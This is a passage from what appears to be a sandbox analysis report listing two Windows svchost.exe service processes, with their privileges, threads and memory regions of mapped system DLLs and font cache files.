region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2766 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2767 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2768 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 467 os_tid = 0x7ec Thread: id = 468 os_tid = 0x84c Thread: id = 469 os_tid = 0x7c0 Thread: id = 470 os_tid = 0x7c4 Thread: id = 471 os_tid = 0x758 Thread: id = 472 os_tid = 0x614 Thread: id = 473 os_tid = 0x610 Thread: id = 474 os_tid = 0x608 Thread: id = 475 os_tid = 0x414 Thread: id = 476 os_tid = 0x150 Thread: id = 477 os_tid = 0x158 Thread: id = 478 os_tid = 0x3d8 Thread: id = 479 os_tid = 0x35c Thread: id = 793 os_tid = 0x6d4 Process: id = "46" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x43c0f000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e446" [0xc000000f], "LOCAL" [0x7] Region: id = 4603 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4604 start_va = 0xc299b70000 end_va = 0xc299b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299b70000" filename = "" Region: id = 4605 start_va = 0xc299b80000 end_va = 0xc299b80fff entry_point = 0xc299b80000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4606 start_va = 0xc299b90000 end_va = 0xc299ba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299b90000" filename = "" Region: id = 4607 start_va = 0xc299bb0000 end_va = 0xc299c2ffff entry_point = 0x0 region_type = private name = "private_0x000000c299bb0000" filename = "" Region: id = 4608 start_va = 0xc299c30000 end_va = 0xc299c33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299c30000" filename = "" Region: id = 4609 start_va = 0xc299c40000 end_va = 0xc299c40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299c40000" filename = "" Region: id = 4610 start_va = 0xc299c50000 end_va = 0xc299c51fff entry_point = 0x0 region_type = private name = "private_0x000000c299c50000" filename = "" Region: id = 4611 start_va = 0xc299c60000 end_va = 0xc299c60fff entry_point = 0x0 region_type = private name = "private_0x000000c299c60000" filename = "" Region: id = 4612 start_va = 0xc299c70000 end_va = 0xc299c70fff entry_point = 0x0 region_type = private name = "private_0x000000c299c70000" filename = "" Region: id = 4613 start_va = 0xc299c80000 end_va = 0xc299c80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299c80000" filename = "" Region: id = 4614 start_va = 0xc299c90000 end_va = 0xc299c90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299c90000" filename = "" Region: id = 4615 start_va = 0xc299cc0000 end_va = 0xc299cc6fff entry_point = 0x0 region_type = private name = "private_0x000000c299cc0000" filename = "" Region: id = 4616 start_va = 0xc299d00000 end_va = 0xc299dfffff entry_point = 0x0 region_type = private name = "private_0x000000c299d00000" filename = "" Region: id = 4617 start_va = 0xc299e00000 end_va = 0xc299ebdfff entry_point = 0xc299e00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4618 start_va = 0xc299f40000 end_va = 0xc299ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c299f40000" filename = "" Region: id = 4619 start_va = 0xc29a050000 end_va = 0xc29a056fff entry_point = 0x0 region_type = private name = "private_0x000000c29a050000" filename = "" Region: id = 4620 start_va = 0xc29a060000 end_va = 0xc29a0dffff entry_point = 0x0 region_type = private name = "private_0x000000c29a060000" filename = "" Region: id = 4621 start_va = 0xc29a100000 end_va = 0xc29a1fffff entry_point = 0x0 region_type = private name = "private_0x000000c29a100000" filename = "" Region: id = 4622 start_va = 0xc29a200000 end_va = 0xc29a387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c29a200000" filename = "" Region: id = 4623 start_va = 0xc29a390000 end_va = 0xc29a510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c29a390000" filename = "" Region: id = 4624 start_va = 0xc29a520000 end_va = 0xc29a61ffff entry_point = 0x0 region_type = private name = "private_0x000000c29a520000" filename = "" Region: id = 4625 start_va = 0xc29a620000 end_va = 0xc29a71ffff entry_point = 0x0 region_type = private name = "private_0x000000c29a620000" filename = "" Region: id = 4626 start_va = 0xc29a720000 end_va = 0xc29a81ffff entry_point = 0x0 region_type = private name = "private_0x000000c29a720000" filename = "" Region: id = 4627 start_va = 0xc29a820000 end_va = 0xc29ab56fff entry_point = 0xc29a820000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4628 start_va = 0xc29ab60000 end_va = 0xc29ac5ffff entry_point = 0x0 region_type = private name = "private_0x000000c29ab60000" filename = "" Region: id = 4629 start_va = 0xc29ac60000 end_va = 0xc29ad5ffff entry_point = 0x0 region_type = private name = "private_0x000000c29ac60000" filename = "" Region: id = 4630 start_va = 0xc29ad60000 end_va = 0xc29ae5ffff entry_point = 0x0 region_type = private name = "private_0x000000c29ad60000" filename = "" Region: id = 4631 start_va = 0xc29af60000 end_va = 0xc29b05ffff entry_point = 0x0 region_type = private name = "private_0x000000c29af60000" filename = "" Region: id = 4632 start_va = 0x7df5ffa50000 end_va = 0x7ff5ffa4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa50000" filename = "" Region: id = 4633 start_va = 0x7ff787054000 end_va = 0x7ff787055fff entry_point = 0x0 region_type = private name = "private_0x00007ff787054000" filename = "" Region: id = 4634 start_va = 0x7ff78705a000 end_va = 0x7ff78705bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78705a000" filename = "" Region: id = 4635 start_va = 0x7ff78705c000 end_va = 0x7ff78705dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78705c000" filename = "" Region: id = 4636 start_va = 0x7ff78705e000 end_va = 0x7ff78705ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78705e000" filename = "" Region: id = 4637 start_va = 0x7ff787060000 end_va = 0x7ff78715ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787060000" filename = "" Region: id = 4638 start_va = 0x7ff787160000 end_va = 0x7ff787182fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787160000" filename = "" Region: id = 4639 start_va = 0x7ff787184000 end_va = 0x7ff787185fff entry_point = 0x0 region_type = private name = "private_0x00007ff787184000" filename = "" Region: id = 4640 start_va = 0x7ff787186000 end_va = 0x7ff787187fff entry_point = 0x0 region_type = private name = "private_0x00007ff787186000" filename = "" Region: id = 4641 start_va = 0x7ff787188000 end_va = 0x7ff787188fff entry_point = 0x0 region_type = private name = "private_0x00007ff787188000" filename = "" Region: id = 4642 start_va = 0x7ff78718a000 end_va = 0x7ff78718bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78718a000" filename = "" Region: id = 4643 start_va = 0x7ff78718c000 end_va = 0x7ff78718dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78718c000" filename = "" Region: id = 4644 start_va = 0x7ff78718e000 end_va = 0x7ff78718ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78718e000" filename = "" Region: id = 4645 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4646 start_va = 0x7ffae6210000 end_va = 0x7ffae6250fff entry_point = 0x7ffae6210000 region_type = mapped_file name = "ssdpsrv.dll" filename = "\\Windows\\System32\\ssdpsrv.dll" (normalized: "c:\\windows\\system32\\ssdpsrv.dll") Region: id = 4647 start_va = 0x7ffae8710000 end_va = 0x7ffae8752fff entry_point = 0x7ffae8710000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 4648 start_va = 0x7ffaec7b0000 end_va = 0x7ffaec7b7fff entry_point = 0x7ffaec7b0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4649 start_va = 0x7ffaec7c0000 end_va = 0x7ffaec7c7fff entry_point = 0x7ffaec7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4650 start_va = 0x7ffaec7d0000 end_va = 0x7ffaec7d9fff entry_point = 0x7ffaec7d0000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 4651 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4652 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4653 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4654 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4655 start_va = 0x7ffaf1610000 end_va = 0x7ffaf161bfff entry_point = 0x7ffaf1610000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 4656 start_va = 0x7ffaf18f0000 end_va = 0x7ffaf191cfff entry_point = 0x7ffaf18f0000 region_type = mapped_file name = "timebrokerserver.dll" filename = "\\Windows\\System32\\TimeBrokerServer.dll" (normalized: "c:\\windows\\system32\\timebrokerserver.dll") Region: id = 4657 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4658 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4659 start_va = 0x7ffaf2560000 end_va = 0x7ffaf2627fff entry_point = 0x7ffaf2560000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4660 start_va = 0x7ffaf2c40000 end_va = 0x7ffaf2c7efff entry_point = 0x7ffaf2c40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 4661 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4662 start_va = 0x7ffaf2ef0000 end_va = 0x7ffaf2fddfff entry_point = 0x7ffaf2ef0000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 4663 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4664 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4665 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4666 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4667 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4668 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4669 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4670 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4671 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4672 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4673 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4674 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4675 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4676 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4677 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4678 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4679 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4680 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4681 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4682 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4683 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4684 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4685 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4686 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4687 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4688 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4689 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4690 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 480 os_tid = 0xe70 Thread: id = 481 os_tid = 0x940 Thread: id = 482 os_tid = 0x924 Thread: id = 483 os_tid = 0x91c Thread: id = 484 os_tid = 0x910 Thread: id = 485 os_tid = 0x8a8 Thread: id = 486 os_tid = 0x398 Thread: id = 487 os_tid = 0x394 Thread: id = 488 os_tid = 0x36c Process: id = "47" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47a2b000" os_pid = "0x3a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e74b" [0xc000000f], "LOCAL" [0x7] Region: id = 3361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3362 start_va = 0xe733c40000 end_va = 0xe733c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733c40000" filename = "" Region: id = 3363 start_va = 0xe733c50000 end_va = 0xe733c50fff entry_point = 0xe733c50000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 3364 start_va = 0xe733c60000 end_va = 0xe733c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733c60000" filename = "" Region: id = 3365 start_va = 0xe733c80000 end_va = 0xe733cfffff entry_point = 0x0 region_type = private name = "private_0x000000e733c80000" filename = "" Region: id = 3366 start_va = 0xe733d00000 end_va = 0xe733d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733d00000" filename = "" Region: id = 3367 start_va = 0xe733d10000 end_va = 0xe733d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733d10000" filename = "" Region: id = 3368 start_va = 0xe733d20000 end_va = 0xe733d21fff entry_point = 0x0 region_type = private name = "private_0x000000e733d20000" filename = "" Region: id = 3369 start_va = 0xe733d30000 end_va = 0xe733dedfff entry_point = 0xe733d30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3370 start_va = 0xe733df0000 end_va = 0xe733df6fff entry_point = 0x0 region_type = private name = "private_0x000000e733df0000" filename = "" Region: id = 3371 start_va = 0xe733e00000 end_va = 0xe733efffff entry_point = 0x0 region_type = private name = "private_0x000000e733e00000" filename = "" Region: id = 3372 start_va = 0xe733f80000 end_va = 0xe73403ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e733f80000" filename = "" Region: id = 3373 start_va = 0xe734040000 end_va = 0xe734046fff entry_point = 0x0 region_type = private name = "private_0x000000e734040000" filename = "" Region: id = 3374 start_va = 0xe734050000 end_va = 0xe734050fff entry_point = 0x0 region_type = private name = "private_0x000000e734050000" filename = "" Region: id = 3375 start_va = 0xe734060000 end_va = 0xe734060fff entry_point = 0x0 region_type = private name = "private_0x000000e734060000" filename = "" Region: id = 3376 start_va = 0xe734070000 end_va = 0xe734070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734070000" filename = "" Region: id = 3377 start_va = 0xe734080000 end_va = 0xe7340fffff entry_point = 0x0 region_type = private name = "private_0x000000e734080000" filename = "" Region: id = 3378 start_va = 0xe734100000 end_va = 0xe7341fffff entry_point = 0x0 region_type = private name = "private_0x000000e734100000" filename = "" Region: id = 3379 start_va = 0xe734200000 end_va = 0xe734387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734200000" filename = "" Region: id = 3380 start_va = 0xe734390000 end_va = 0xe734510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e734390000" filename = "" Region: id = 3381 start_va = 0xe734520000 end_va = 0xe734595fff entry_point = 0xe734520000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 3382 start_va = 0xe7345a0000 end_va = 0xe7345b1fff entry_point = 0xe7345a0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3383 start_va = 0xe7345c0000 end_va = 0xe7345c4fff entry_point = 0xe7345c0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3384 start_va = 0xe7345d0000 end_va = 0xe7345d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7345d0000" filename = "" Region: id = 3385 start_va = 0xe7345e0000 end_va = 0xe7345e1fff entry_point = 0xe7345e0000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 3386 start_va = 0xe7345f0000 end_va = 0xe7345f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7345f0000" filename = "" Region: id = 3387 start_va = 0xe734620000 end_va = 0xe734956fff entry_point = 0xe734620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3388 start_va = 0xe734960000 end_va = 0xe734a5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734960000" filename = "" Region: id = 3389 start_va = 0xe734a60000 end_va = 0xe734b5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734a60000" filename = "" Region: id = 3390 start_va = 0xe734b60000 end_va = 0xe734c5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734b60000" filename = "" Region: id = 3391 start_va = 0xe734c60000 end_va = 0xe734d5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734c60000" filename = "" Region: id = 3392 start_va = 0xe734d60000 end_va = 0xe734e5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734d60000" filename = "" Region: id = 3393 start_va = 0xe734e60000 end_va = 0xe734f5ffff entry_point = 0x0 region_type = private name = "private_0x000000e734e60000" filename = "" Region: id = 3394 start_va = 0xe734f60000 end_va = 0xe735f5ffff entry_point = 0xe734f60000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 3395 start_va = 0xe735f60000 end_va = 0xe73605ffff entry_point = 0x0 region_type = private name = "private_0x000000e735f60000" filename = "" Region: id = 3396 start_va = 0xe736060000 end_va = 0xe73615ffff entry_point = 0x0 region_type = private name = "private_0x000000e736060000" filename = "" Region: id = 3397 start_va = 0xe736a60000 end_va = 0xe736b5ffff entry_point = 0x0 region_type = private name = "private_0x000000e736a60000" filename = "" Region: id = 3398 start_va = 0xe736b60000 end_va = 0xe736c5ffff entry_point = 0x0 region_type = private name = "private_0x000000e736b60000" filename = "" Region: id = 3399 start_va = 0xe736d00000 end_va = 0xe736dfffff entry_point = 0x0 region_type = private name = "private_0x000000e736d00000" filename = "" Region: id = 3400 start_va = 0xe736e00000 end_va = 0xe736efffff entry_point = 0x0 region_type = private name = "private_0x000000e736e00000" filename = 